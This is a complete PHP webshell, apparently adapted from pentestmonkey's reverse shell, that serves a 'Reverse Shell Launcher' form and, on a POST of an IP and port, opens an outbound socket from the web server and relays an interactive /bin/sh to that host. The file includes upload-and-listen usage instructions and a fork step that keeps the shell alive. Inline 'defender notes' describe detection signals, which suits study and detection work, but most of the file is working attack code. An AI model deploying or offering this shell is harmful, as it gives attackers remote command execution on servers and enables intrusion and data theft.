<?php
// web-reverse-shell.php
// A web interface for the classic PHP reverse shell.
// Usage: Upload to a server, access via browser, enter your IP and port, then submit.
// Make sure you have a listener ready (e.g., nc -lvnp <port>).
//
// Defender note: this file is a web-triggered reverse shell, i.e. a webshell-class
// artifact. Anything that can send a POST to it can make the web server open an
// outbound TCP connection and hand the remote side an interactive /bin/sh running
// under the PHP worker's account. Its presence in a web root is itself an indicator
// of compromise; the behaviours worth alerting on are named inline below.

// If the form was submitted, run the reverse shell.
// No authentication, session or CSRF check is performed anywhere in this file:
// a POST carrying `ip` and `port` is sufficient to trigger the code path.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['ip']) && isset($_POST['port'])) {
    $ip = trim($_POST['ip']);
    $port = (int)$_POST['port'];
    // Validate input (basic). FILTER_VALIDATE_IP only constrains the *format*
    // (IPv4 or IPv6 literal); the destination itself is entirely caller-chosen.
    if (filter_var($ip, FILTER_VALIDATE_IP) && $port > 0 && $port < 65536) {
        // Start the reverse shell logic (adapted from pentestmonkey's script)
        set_time_limit(0); // lift PHP's max_execution_time so the request can run indefinitely
        $VERSION = "1.0"; // assigned but never read in this block
        $chunk_size = 1400; // bytes per fread() in the relay loop below
        $write_a = null; // no write set passed to stream_select()
        $error_a = null; // no exception set passed to stream_select()
        // Command handed to proc_open(): fingerprints the host (kernel, logged-in
        // users, effective identity) and then drops into an interactive shell.
        // The child inherits the PHP worker's privileges, so what it can do is
        // bounded by that service account's rights.
        $shell = 'uname -a; w; id; /bin/sh -i';
        $daemon = 0; // 1 once detached; printit() then suppresses output
        $debug = 0;  // 1 would echo every relayed chunk via printit()
        // Daemonise if possible (pcntl_fork is rarely available).
        // Defender note: if fork+setsid succeeds the parent returns to the web
        // server while the child keeps the shell alive after the HTTP request
        // ends — look for long-lived children of the web server process that
        // have been re-parented and carry an outbound socket.
        if (function_exists('pcntl_fork')) {
            $pid = pcntl_fork();
            if ($pid == -1) {
                printit("ERROR: Can't fork", $daemon);
                exit(1);
            }
            if ($pid) {
                exit(0); // Parent exits
            }
            if (posix_setsid() == -1) {
                printit("Error: Can't setsid()", $daemon);
                exit(1);
            }
            $daemon = 1;
        } else {
            printit("WARNING: Failed to daemonise. This is common and not fatal.", $daemon);
        }
        // chdir("/") releases the web root; umask(0) means any file the spawned
        // shell creates gets exactly the permission bits requested by the creating
        // call (so 0666/0777 requests are honoured as world-writable).
        chdir("/");
        umask(0);
        // Open reverse connection: an outbound TCP connect from the web server to
        // the submitted address, 30 s connect timeout. Defender note: outbound
        // connections initiated by the PHP/web-server process to arbitrary ports
        // are a high-signal detection; egress filtering from the web tier is the
        // corresponding control.
        $sock = fsockopen($ip, $port, $errno, $errstr, 30);
        if (!$sock) {
            printit("$errstr ($errno)", $daemon);
            exit(1);
        }
        // Spawn shell process with pipes for its stdin (0), stdout (1), stderr (2)
        $descriptorspec = array(
            0 => array("pipe", "r"),
            1 => array("pipe", "w"),
            2 => array("pipe", "w")
        );
        // Defender note: a web-server worker calling proc_open() on a command
        // string containing "/bin/sh -i" is the process-creation event to alert on.
        $process = proc_open($shell, $descriptorspec, $pipes);
        if (!is_resource($process)) {
            printit("ERROR: Can't spawn shell", $daemon);
            exit(1);
        }
        // Set non-blocking so the stream_select() loop below can multiplex all four streams
        stream_set_blocking($pipes[0], 0);
        stream_set_blocking($pipes[1], 0);
        stream_set_blocking($pipes[2], 0);
        stream_set_blocking($sock, 0);
        printit("Successfully opened reverse shell to $ip:$port", $daemon);
        // Main loop: forward data between socket and shell pipes.
        // Runs until either the remote side closes the socket or the shell exits.
        // Nothing relayed here is logged or filtered, so every command and its
        // output pass through unrecorded by the application.
        while (1) {
            if (feof($sock)) {
                printit("ERROR: Shell connection terminated", $daemon);
                break;
            }
            if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated", $daemon);
                break;
            }
            // Watch the socket and the shell's stdout/stderr for readability;
            // a null timeout blocks until at least one of them is ready.
            $read_a = array($sock, $pipes[1], $pipes[2]);
            $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
            // Remote -> shell stdin
            if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ", $daemon);
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input", $daemon);
                fwrite($pipes[0], $input);
            }
            // Shell stdout -> remote
            if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ", $daemon);
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input", $daemon);
                fwrite($sock, $input);
            }
            // Shell stderr -> remote (same channel as stdout)
            if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ", $daemon);
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input", $daemon);
                fwrite($sock, $input);
            }
        }
        // Tear down the socket, the three pipes and the child process
        fclose($sock);
        fclose($pipes[0]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($process);
        exit; // Stop further output after shell ends
    } else {
        // Fixed literal; rendered by the form below. It is never user-derived.
        $error = "Invalid IP or port.";
    }
}
// Helper function for printing (only if not daemonised)
// Emit one diagnostic line to the HTTP response, but only while this process is
// still attached to the web server request (i.e. not daemonised). After forking
// into the background there is no client to write to, so output is suppressed.
function printit($string, $daemon) {
    if ($daemon) {
        return;
    }
    echo $string . "\n";
}
// Display the form if not already executing the shell
// Display the form if not already executing the shell.
// $process is only assigned once proc_open() has been reached, so this branch
// renders for GET requests, POSTs missing `ip`/`port`, and failed validation
// (which sets $error). Every failure path before proc_open() calls exit(1), so
// it never reaches here with $process set to false.
if (!isset($process)) {
?>
<!DOCTYPE html>
<html>
<head>
<title>PHP Reverse Shell Web Interface</title>
<style>
body { font-family: Arial, sans-serif; margin: 50px; }
input { padding: 5px; margin: 5px; }
.error { color: red; }
</style>
</head>
<body>
<h2>PHP Reverse Shell Launcher</h2>
<?php /* $error is only ever the fixed literal set above, so echoing it without
         htmlspecialchars() is not injectable here; if it ever becomes
         request-derived it must be escaped for HTML context. */
if (isset($error)) echo "<p class='error'>$error</p>"; ?>
<form method="post">
<label>Your IP address:</label>
<input type="text" name="ip" placeholder="e.g., 192.168.1.100" required><br>
<label>Port:</label>
<input type="number" name="port" placeholder="e.g., 4444" required><br>
<input type="submit" value="Connect Back">
</form>
<p><strong>Note:</strong> This script uses <code>proc_open()</code>. If that function is disabled, the shell will not work. Also ensure your listener is ready (e.g., <code>nc -lvnp <port></code>).</p>
</body>
</html>
<?php
// end of the form-rendering branch
}
?>